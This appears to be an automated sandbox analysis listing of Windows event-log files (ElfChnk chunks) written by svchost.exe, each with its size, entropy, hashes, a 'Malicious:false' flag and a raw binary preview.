                            Preview:ElfChnk.>...............>...........................=3.z....................................................................6WY ................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.495116691902589
                            Encrypted:false
                            SSDEEP:384:ShN7s7o787l7r787a7J7z7+7N17g7x7o7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:S9HuCg
                            MD5:8F5FACAEC835E59EB086543AA14D1E5D
                            SHA1:9C7A60C39666234A41FCAE59B937DC293D78D89E
                            SHA-256:E6452075DCD968D2B4CC467515B3D7BA3AAF671A5132D6D40B87D1E50E4C876A
                            SHA-512:1D965EA89653B71D11BE8AEF985E718E869D8AAEC6C055F999CDC8A63ACD28FA39E7C4A6979B7D2024F3DE39466296B852279223FBC6935D635F0189E58C0240
                            Malicious:false
                            Preview:ElfChnk.Y.......g.......Y.......g............%...&..J]......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.1499045494600955
                            Encrypted:false
                            SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                            MD5:2045FB0D54CA8F456B545859B9F9B0A8
                            SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                            SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                            SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                            Malicious:false
                            Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8164696340947971
                            Encrypted:false
                            SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                            MD5:1AB19FA472669F4334C7A9D44E94E1B3
                            SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                            SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                            SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                            Malicious:false
                            Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9855903635327656
                            Encrypted:false
                            SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                            MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                            SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                            SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                            SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                            Malicious:false
                            Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.165454452307923
                            Encrypted:false
                            SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                            MD5:B6B6F199DA64422984403D7374F32528
                            SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                            SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                            SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                            Malicious:false
                            Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.8519554794255333
                            Encrypted:false
                            SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                            MD5:4140628CA3CEC29C0B506CEEBDF684F6
                            SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                            SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                            SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                            Malicious:false
                            Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.1642919553794224
                            Encrypted:false
                            SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                            MD5:D7EECF043241FDB9486580582E208603
                            SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                            SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                            SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                            Malicious:false
                            Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.576079103773187
                            Encrypted:false
                            SSDEEP:768:oQvIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbq:Vm+Jao7mce8p2
                            MD5:5096A411FC8DE7A2EFE92D23786E1D4C
                            SHA1:DA92531A9728B9F56DCF5148A2C40C92A9FD4758
                            SHA-256:617D84832BBDD349A4E2D0FC818A40AAF4C6F637149839DEBCB32E522D9D6AEC
                            SHA-512:37E6AD0C7429FBE8358803D723D827FD434005106171FC4008AFE45FECAD93997C0E26EED4C7B90A21E054C663463B720F6F169CF8263715041807AFCA33AD91
                            Malicious:false
                            Preview:ElfChnk.........................................."...9.Z....................................................................B.. ........................................4...=...........................................................................................................................f...............?...........................m...................M...F...........................................................U...................................................&...................................**..0...........|R...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.178629627614653
                            Encrypted:false
                            SSDEEP:384:shL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmLjUm:sY7Lu
                            MD5:FCEF23A3691F5D78A27C76D95B2F5ACA
                            SHA1:E3F120D9DB395881D78867302DB16507D5C80E6C
                            SHA-256:F0E54B18E4C12AF5DBBA107ACAF7F6DA974A72AF12B7AD22BB1AD9D9A6BAB2C7
                            SHA-512:63F56C9337D1DE757655594F51B967EC4D3F7CD2CF28E4F75AC3123A2B5B11A33B343B85EEE1BB7C1C6482EE0AEC91B5E7B72502F0E15310F86E810DEC155C67
                            Malicious:false
                            Preview:ElfChnk....................................../..(4....\.....................................................................G................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.2040196879846349
                            Encrypted:false
                            SSDEEP:48:MVW4XrP+MZQNRBEZWTENO4bpBkoDlgD/6FgVt:A5KNVaO80oZgD/6Fg
                            MD5:874B3F865EE985A801125E4649C849FE
                            SHA1:20E2318217B84C7180FB988DFD93F3F5943D9808
                            SHA-256:CAF7DB29DB1E6C58EC894D5242E0692BE134FF4845F12A0DC03BA439B34486A6
                            SHA-512:794C55E71C3570120620395E78E26729A6178F36588CF19B2CA976ADB7F100FB14E2318998EC4983FFA6D2EA92E6C9EBB54003AB7647DBE72DA34136A28B7106
                            Malicious:false
                            Preview:ElfChnk.............................................B........................................................................5.O................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.6469884746870727
                            Encrypted:false
                            SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                            MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                            SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                            SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                            SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                            Malicious:false
                            Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.4067373813600383
                            Encrypted:false
                            SSDEEP:768:hWa0NPaDaLaPa3ababafa3ananabaHaXarafa7ajaHajaTavaO6a3ajaPa7aXafC:KNH
                            MD5:C9086547BF5F9E822F359679E7F67F40
                            SHA1:2127B927EF9B279FC383FEE43C8B44E92864FF85
                            SHA-256:327257210F79945FB3AE7D54F04FC2BE85846177A9CEE0499AFC206F6DE5F944
                            SHA-512:887882FA560420B90E0D5214C5025BFB3BFF2D1B3670F4E4957CFA65531E2524F2E41E651B61AABCBCB89613038BF5AFEE0CBFF582EA520956172D1337C31D24
                            Malicious:false
                            Preview:ElfChnk.........@...............@...............`......s......................................................................h................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H.............0...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.3132453844344478
                            Encrypted:false
                            SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                            MD5:6237EE0458A0478242B975E9BB7AA97D
                            SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                            SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                            SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                            Malicious:false
                            Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.325262033408211
                            Encrypted:false
                            SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                            MD5:D13189B45679E53F5744A4D449F8B00F
                            SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                            SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                            SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                            Malicious:false
                            Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.7947046118743749
                            Encrypted:false
                            SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                            MD5:55E73A924B170FBFFF862E8E195E839A
                            SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                            SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                            SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                            Malicious:false
                            Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
                            Category:dropped
                            Size (bytes):84544
                            Entropy (8bit):2.0943351215716235
                            Encrypted:false
                            SSDEEP:1536:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Ga6DMpP9JcY6+g4+Ga6F:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Gah
                            MD5:6B97F9A35583E15C3DC8274B3F0A7C72
                            SHA1:3EF206DEA358D780843CCAA28B9A40181546FB14
                            SHA-256:543F899BE6482935B952D0867AF10C6B064E23D934EF374AFD55DAA67B3A8155
                            SHA-512:A8212DFF9DFF9B6241868C752FF84024ED6A61A2767838AC1FA983C768F7DF2A38D7119850556AC3AC95D991024A2F5E1330779B6032C6CF0FFF627E7A48CBA5
                            Malicious:false
                            Preview:ElfFile.........................................................................................................................ElfChnk.....................................p ..."..x.......................................................................N{..................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................^...3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):66560
                            Entropy (8bit):4.362194486499595
                            Encrypted:false
                            SSDEEP:384:1cRqxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdO:1pxA8nPLGbMb
                            MD5:6AA5FD4D824EFD4448C04B35C094FF56
                            SHA1:B4EF0825ADCF4192C9F9E9E223077517D77E4BE5
                            SHA-256:E1440DDE27BCA23A2D29924AF202F43F54172C55AEF549E71F41DC08B532EDC8
                            SHA-512:E1378BB8FF3F6FBC56648CAD6168F59CB62AB01F42A6992F34D14C6B46D2498176E17F01C4DD63D15273491D38AF1A16791F014BB469F4292ABE8C9D1823C630
                            Malicious:false
                            Preview:ElfChnk............................................./I......................................................................+s.......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**...............S..1..........x68................................................................<.......T.....!................@.S..1...KK..A..K..U.8.w.....\........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e.......%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.273338343434408
                            Encrypted:false
                            SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                            MD5:C37372EB51AEDB4552CB839C7294403A
                            SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                            SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                            SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                            Malicious:false
                            Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.231195890775603
                            Encrypted:false
                            SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                            MD5:3365A34953FD7B16667108A049B64DA5
                            SHA1:C72421A58E063D64072152344B266F8306A78702
                            SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                            SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                            Malicious:false
                            Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.350996099530715
                            Encrypted:false
                            SSDEEP:384:dh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwG:dOqabeGTnbuSxg6On
                            MD5:4A38F556B28847C79565F8F5B2E18529
                            SHA1:581498A0BC8A3EC2988AFE5C7FC0F60E14DF289A
                            SHA-256:E86ADB1001A17550D1F82D4B4136E5BD225EFC1D5456A36CE24E78834324A687
                            SHA-512:CE66231966337110F34D59C0E361E8859EE0B350AFFA40FAFAA47D58E105CD4D54F8ED8FA1B9A8F61E0C8F01CAA4CB364CDF58A9FC7BADDBF203EEE003F9F54F
                            Malicious:false
